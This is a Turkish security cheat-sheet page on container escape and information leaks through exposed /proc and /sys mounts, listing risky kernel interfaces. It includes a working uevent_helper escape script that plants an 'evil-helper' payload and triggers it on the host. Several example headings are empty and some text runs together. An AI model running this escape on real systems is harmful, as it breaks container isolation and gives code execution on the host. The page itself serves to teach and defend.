Sensitive Mounts
Doğru namespace izolasyonu olmadan /proc ve /sys'in maruz kalması, saldırı yüzeyinin genişlemesi ve bilgi sızdırma gibi ciddi güvenlik risklerini beraberinde getirir. Bu dizinler, yanlış yapılandırılmış veya yetkisiz bir kullanıcı tarafından erişilen hassas dosyaları içerir ve bu da konteyner kaçışına, ana bilgisayarın değiştirilmesine veya daha fazla saldırıya yardımcı olacak bilgilerin sağlanmasına yol açabilir. Örneğin, -v /proc:/host/proc şeklinde yanlış bağlama yapılması, yol tabanlı doğası nedeniyle AppArmor korumasını atlayabilir ve /host/proc'u korumasız bırakabilir.
Her potansiyel zafiyetin daha fazla ayrıntısını https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts** adresinde bulabilirsiniz.**
procfs Zafiyetleri
/proc/sys
/proc/sysBu dizin, genellikle sysctl(2) aracılığıyla çekirdek değişkenlerini değiştirme izni verir ve endişe kaynağı olan birkaç alt dizini içerir:
/proc/sys/kernel/core_pattern
/proc/sys/kernel/core_patterncore(5) adresinde açıklanmıştır.
İlk 128 baytı argümanlar olarak alan bir programın çekirdek dosyası oluşturulduğunda çalıştırılmasına izin verir. Dosya bir boru
|ile başlıyorsa kod yürütme olabilir.Test ve Sömürü Örneği:
/proc/sys/kernel/modprobe
/proc/sys/kernel/modprobeproc(5) adresinde detaylı olarak açıklanmıştır.
Çekirdek modül yükleyicisinin yolunu içerir ve çekirdek modüllerini yüklemek için çağrılır.
Erişimi Kontrol Etme Örneği:
/proc/sys/vm/panic_on_oom
/proc/sys/vm/panic_on_oomproc(5) adresinde referans gösterilmiştir.
Bir OOM durumu meydana geldiğinde çekirdeğin çökmesini veya OOM öldürücüyü çağırmasını kontrol eden genel bir bayrak.
/proc/sys/fs
/proc/sys/fsproc(5) adresinde belirtildiği gibi, dosya sistemi hakkında seçenekler ve bilgiler içerir.
Yazma erişimi, ana bilgisayara karşı çeşitli hizmet reddi saldırılarına olanak tanır.
/proc/sys/fs/binfmt_misc
/proc/sys/fs/binfmt_miscSihirli sayılarına dayalı olmayan ikili biçimler için yorumlayıcıları kaydetmeye olanak tanır.
/proc/sys/fs/binfmt_misc/registeryazılabilirse ayrıcalık yükseltmesine veya kök kabuk erişimine yol açabilir.İlgili saldırı ve açıklama:
Detaylı öğretici: Video bağlantısı
Diğerleri /proc içinde
/proc içinde/proc/config.gz
/proc/config.gzCONFIG_IKCONFIG_PROCetkinse çekirdek yapılandırmasını ortaya çıkarabilir.Çalışan çekirdekteki zafiyetleri belirlemek için saldırganlar için faydalıdır.
/proc/sysrq-trigger
/proc/sysrq-triggerSysrq komutlarını çağırmaya izin verir ve potansiyel olarak anında sistem yeniden başlatmalar veya diğer kritik işlemlere neden olabilir.
Ana Bilgisayarı Yeniden Başlatma Örneği:
/proc/kmsg
/proc/kmsgÇekirdek halka tamponu mesajlarını açığa çıkarır.
Çekirdek saldırılarına, adres sızıntılarına ve hassas sistem bilgilerinin sağlanmasına yardımcı olabilir.
/proc/kallsyms
/proc/kallsymsÇekirdek dışa aktarılan sembolleri ve adreslerini listeler.
Özellikle KASLR'yi aşmak için çekirdek saldırı geliştirme için temel öneme sahiptir.
Adres bilgileri
kptr_restrict'in1veya2olarak ayarlanmasıyla sınırlıdır.Detaylar proc(5) adresinde bulunabilir.
/proc/[pid]/mem
/proc/[pid]/memÇekirdek bellek cihazı
/dev/memile etkileşim sağlar.Tarihsel olarak ayrıcalık yükseltme saldırılarına karşı savunmasızdır.
Daha fazlası için proc(5) adresine bakın.
/proc/kcore
/proc/kcoreSistemin fiziksel belleğini ELF çekirdek biçiminde temsil eder.
Okuma, ana bilgisayar sistemi ve diğer konteynerlerin bellek içeriğini sızdırabilir.
Büyük dosya boyutu okuma sorunlarına veya yazılım çökmelerine yol açabilir.
Ayrıntılı kullanım 2019'da /proc/kcore Dökme adresinde bulunabilir.
/proc/kmem
/proc/kmemÇekirdek sanal belleği temsil eden
/dev/kmemiçin alternatif bir arayüz.Okuma ve yazma izni verir, dolayısıyla çekirdek belleğinin doğrudan değiştirilmesine olanak tanır.
/proc/mem
/proc/memFiziksel belleği temsil eden
/dev/memiçin alternatif bir arayüz.Okuma ve yazma izni verir, tüm belleğin değiştirilmesi sanal adresleri fiziksel adreslere çözümlemeyi gerektirir.
/proc/sched_debug
/proc/sched_debugPID ad alanı korumalarını atlayarak işlem zamanlama bilgilerini döndürür.
İşlem adlarını, kimlikleri ve cgroup tanımlayıcılarını açığa çıkarır.
/proc/[pid]/mountinfo
/proc/[pid]/mountinfoİşlem bağlantı noktaları hakkında bilgi sağlar.
Konteynerin
rootfsveya görüntünün konumunu açığa çıkarır.
/sys Zafiyetleri
/sys Zafiyetleri/sys/kernel/uevent_helper
/sys/kernel/uevent_helperÇekirdek cihaz
uevent'leri işlemek için kullanılır./sys/kernel/uevent_helper'a yazmak,ueventtetikleyicileri üzerine keyfi komut dosyalarını yürütebilir.Sömürü için Örnek: %%%bash
Bir yük oluşturur
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
OverlayFS bağlantı noktasından ana bilgisayar yolunu bulur
host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)
uevent_helper'ı kötü amaçlı yardımcıya ayarlar
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
Bir uevent tetikler
echo change > /sys/class/mem/null/uevent
Çıktıyı okur
cat /output %%%
/sys/class/thermal
/sys/class/thermalSıcaklık ayarlarını kontrol eder, olası DoS saldırılarına veya fiziksel hasara neden olabilir.
/sys/kernel/vmcoreinfo
/sys/kernel/vmcoreinfoKernel adreslerini sızdırır, KASLR'ı tehlikeye atabilir.
/sys/kernel/security
/sys/kernel/securitysecurityfsarayüzünü barındırır, AppArmor gibi Linux Güvenlik Modülleri'nin yapılandırılmasına izin verir.Erişim, bir konteynerin MAC sistemini devre dışı bırakmasına olanak tanıyabilir.
/sys/firmware/efi/vars ve /sys/firmware/efi/efivars
/sys/firmware/efi/vars ve /sys/firmware/efi/efivarsNVRAM'daki EFI değişkenleriyle etkileşim için arayüzler sunar.
Yanlış yapılandırma veya kötüye kullanım, tuğla gibi olan dizüstü bilgisayarlar veya başlatılamayan ana bilgisayar makinelerine yol açabilir.
/sys/kernel/debug
/sys/kernel/debugdebugfs, çekirdeğe "kurallar olmadan" hata ayıklama arayüzü sunar.Sınırsız doğası nedeniyle güvenlik sorunları geçmişi bulunmaktadır.
Referanslar
Last updated
